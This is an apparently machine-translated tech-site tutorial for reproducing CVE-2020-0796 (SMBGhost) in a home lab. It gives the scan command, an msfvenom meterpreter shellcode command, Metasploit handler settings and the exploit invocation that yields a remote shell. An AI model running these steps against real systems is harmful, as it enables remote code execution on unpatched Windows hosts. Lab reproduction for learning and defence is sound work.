Shulou(Shulou.com)05/31 Report--

How to achieve CVE-2020-0796 vulnerability recurrence, I believe that many inexperienced people are helpless about this, this article summarizes the causes of the problem and solutions, through this article I hope you can solve this problem.

Introduction to CVE-2020-0796 0x01 Vulnerability

CVE-2020-0796 is caused by an error in SMBv3 protocol processing malicious compressed packets; when decompressing packets using the length passed by the client, it does not check whether the length is legal, resulting in integer overflow. It allows a remote and unauthenticated attacker to execute arbitrary code on the target system, similar to Eternal Blue.

Vulnerability Hazard Level: High

0x02 Impact Version

Windows 10 Version 1903 for 32-bit Systems

Windows 10 Version 1903 for x64-based Systems

Windows 10 Version 1903 for ARM64-based Systems

Windows Server, Version 1903 (Server Core installation)

Windows 10 Version 1909 for 32-bit Systems

Windows 10 Version 1909 for x64-based Systems

Windows 10 Version 1909 for ARM64-based Systems

Windows Server, Version 1909 (Server Core installation)

II. Experimental environment

drone: vulnerable win10 virtual machine environment, system image:

ed2k://|file|cn_windows_10_consumer_editions_version_1903_x64_dvd_8f05241d.iso|4905476096|F28FDC23DA34D55BA466BFD6E91DD311|/

IP address: 192.168.117.150

Notes after installing the mirror:

·Turn off Windows 10 firewall to enable ping to each other

·Turn off Windows 10 automatic updates to avoid vulnerabilities being patched

Detection Tools:

https://github.com/dickens88/cve-2020-0796-scanner

getshell code:

https://github.com/chompie1337/SMBGhost_RCE_PoC

Attack aircraft: kali

IP address: 192.168.117.132

III. REPRODUCTION PROCESS

1. First scan the target host with the detection code and find vulnerabilities.

python3 cve-2020-0796-scanner.py -t 192.168.117.150

2. Generate shellcode code using msfvenom command

msfvenom -p windows/x64/meterpreter/bind_tcp lport=3333 -f py -o shellcode.txt

Replace the USER_PAYLOAD part of the exploit.py in the getshell code with the code in the generated shellcode.txt

3. Open msf in kali Use handler module to open listening

msfconsoleuse exploit/multi/handlerset payload windows/x64/meterpreter/bind_tcpset rhost 192.168.117.150set lport 3333run

4. Run the modified exploit code:

python3 exploit.py -ip 192.168.117.150

5. Found in msf console successfully get bounce shell

6. Found garbled code, use chcp 65001 to display normal

The reproduction is complete.

IV. Errors that occur

Some errors in the modified source code need to be corrected.

After reading the above, do you know how to implement CVE-2020-0796 vulnerability recurrence? If you still want to learn more skills or want to know more related content, welcome to pay attention to the industry information channel, thank you for reading!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.